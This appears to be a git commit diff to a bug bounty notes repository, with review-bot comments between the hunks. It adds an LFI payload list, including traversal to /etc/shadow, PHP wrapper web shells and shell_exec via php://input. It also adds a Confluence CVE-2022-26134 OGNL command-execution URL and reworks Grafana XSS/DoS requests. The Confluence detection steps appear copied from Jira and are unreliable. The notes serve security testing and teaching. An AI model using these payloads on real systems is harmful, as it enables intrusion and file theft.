Add LFI + Confluence and fix grafana structure

Muhammad Daffa 2022-06-18 21:40:38 +07:00
parent a0048665a1
commit f2880660c0
5 changed files with 144 additions and 9 deletions

View File

@ -1 +1,94 @@
# Soon! ## Local File Inclusion
## Introduction
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server
## How to exploit
1. Basic payload
```
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow
```
2. URL encoding
```
http://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```
3. Double encoding
```
http://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd
```
4. UTF-8 encoding
```
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```
5. Using Null Byte (%00)
```
http://example.com/index.php?page=../../../etc/passwd%00
```
6. From an existent folder
```
http://example.com/index.php?page=scripts/../../../../../etc/passwd
```
7. Path truncation
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
```
8. Using PHP Wrappers: filter
```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=config.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=config.php
```
9. Using PHP Wrappers: zlib
```
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/shadow
```
10. Using PHP Wrappers: zip
```
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
11. Using PHP Wrappers: data
```
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
```
12. Using PHP Wrappers: expect
```
http://example.com/index.php?page=expect://ls
```
13. Using PHP Wrappers: input
```
POST /index.php?page=php://input&cmd=ls HTTP/1.1
Host: example.com
...
<?php echo shell_exec($_GET['cmd']); ?>
```
14. Some unique bypass
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=/.%2e/.%2e/.%2e/.%2e/etc/passwd
http://example.com/index.php?page=/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
```
## References
* [Aptive](https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/)
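Review bot: the replacement title `## Local File Inclusion` is a level-2 heading while the sibling pages in this commit use a level-1 title (`# Grafana`, `# Confluence Common Bugs`); use `# Local File Inclusion` so the notes render consistently. Several items also need the scope caveat that decides whether a finding is real: the null byte in item 5 and the path truncation in item 7 only work against PHP builds older than 5.3.4, `expect://` in item 12 needs the expect extension, which is not compiled in by default, and the `[ADD MORE]` placeholders in item 7 should say what they stand for (padding until the path exceeds the filesystem path length limit). Item 10 mixes four shell commands and the final URL in one fence; put the URL in its own block, as every other item does. Since this is a notes page, a short "How to fix" line (resolve includes from an allow-list of page names, never from raw user input) would round it out alongside the single reference.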

View File

@ -15,7 +15,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md) - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- Local File Inclusion (SOON) - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) - [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
- SQL Injection (SOON) - SQL Injection (SOON)
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
@ -41,6 +41,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
## Technologies ## Technologies
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
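Review bot: the added line reads `[Grafana](.../Technologies/Confluence.md)`, so the link text was copied from the Grafana entry beneath it while the target is the new Confluence page; it should read `- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)` to match the new page's title and keep the alphabetical order of the list.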

View File

@ -0,0 +1,27 @@
# Confluence Common Bugs
## Introduction
What would you do if you came across a website that uses Confluence?
## How to Detect
```
https://example.com/secure/Dashboard.jspa
https://example.com/login.jsp
```
1. Find the related CVE by checking Confluence version
* How to find the Confluence version
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the Confluence version. If you found outdated Confluence version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-6258/Atlassian-Confluence.html)
Some example CVE:
- CVE-2022-26134 (Remote Code Execution)
```
https://example.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
```
- CVE-2021-26085 (Arbitrary File Read)
```
https://example.com/s/test/_/;/WEB-INF/web.xml
```

View File

@ -1,13 +1,27 @@
# Grafana # Grafana
1. CVE-2021-41174 (Reflected XSS)
## Introduction
What would you do if you came across a website that uses Grafana?
## How to Detect
Try to HTTP request to `https://example.com/login` and there is a form login
1. Find the related CVE by checking grafana version
* How to find the grafana version
Try to request to `https://example.com/login` and then check the source code. You will find the version in JSON body `"isEnterprise":false,"latestVersion:"9.0.0","version":"8.3.2"` so 8.3.2 is the grafana version. If you found outdated grafana version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-18548/product_id-47055/Grafana-Grafana.html)
Some example CVE:
- CVE-2021-41174 (Reflected XSS)
``` ```
https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
``` ```
2. CVE-2020-13379 (Denial of Service) - CVE-2020-13379 (Denial of Service)
``` ```
https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
``` ```
3. CVE-2020-11110 (Stored XSS) - CVE-2020-11110 (Stored XSS)
``` ```
POST /api/snapshots HTTP/1.1 POST /api/snapshots HTTP/1.1
Host: example.com Host: example.com
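Review bot: the version-detection sentence has a JSON quoting slip: `"latestVersion:"9.0.0"` should be `"latestVersion":"9.0.0"`, otherwise anyone searching the page source for the key as written finds nothing. The "How to Detect" line also reads awkwardly ("Try to HTTP request to ... and there is a form login"); suggest "Request `https://example.com/login`; a Grafana login form is served". Switching the CVE entries from `1.`/`2.`/`3.` to `-` bullets matches the Confluence page, but the title here stays `# Grafana` while that page is `# Confluence Common Bugs`; pick one title pattern for the Technologies folder.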
@ -19,7 +33,7 @@ Connection: close
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
``` ```
4. CVE-2019-15043 (Grafana Unauthenticated API) - CVE-2019-15043 (Grafana Unauthenticated API)
``` ```
POST /api/snapshots HTTP/1.1 POST /api/snapshots HTTP/1.1
Host: example.com Host: example.com
@ -31,11 +45,11 @@ Content-Type: application/json
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
``` ```
5. Default Credentials 2. Default Credentials
``` ```
Try to login using admin as username and password Try to login using admin as username and password
``` ```
6. Signup Enabled 3. Signup Enabled
``` ```
https://example.com/signup https://example.com/signup
``` ```
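Review bot: renumbering these items to `2.` and `3.` assumes they continue the ordered list started by item `1.` above, but the bullet list and fenced blocks inserted between them will break that list in most Markdown renderers, so they will display as a fresh list starting at 1. Either indent the CVE bullets and their fences under item 1 or make all three top-level items plain headings. Also, "Try to login using admin as username and password" is prose, not a request or URL, and should sit outside the code fence.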

View File

@ -12,7 +12,7 @@ https://example.com/login.jsp
1. Find the related CVE by checking jira version 1. Find the related CVE by checking jira version
* How to find the jira version * How to find the jira version
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html) Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the jira version. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
Some example CVE: Some example CVE:
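Review bot: the reordering to "so 8.20.9 is the jira version" fixes the grammar; while touching this line, capitalize the product name (`Jira`) in all three places, end the sentence with a period, and prefer "view the page source" over "check the source code", since the reader is looking at served HTML rather than application code.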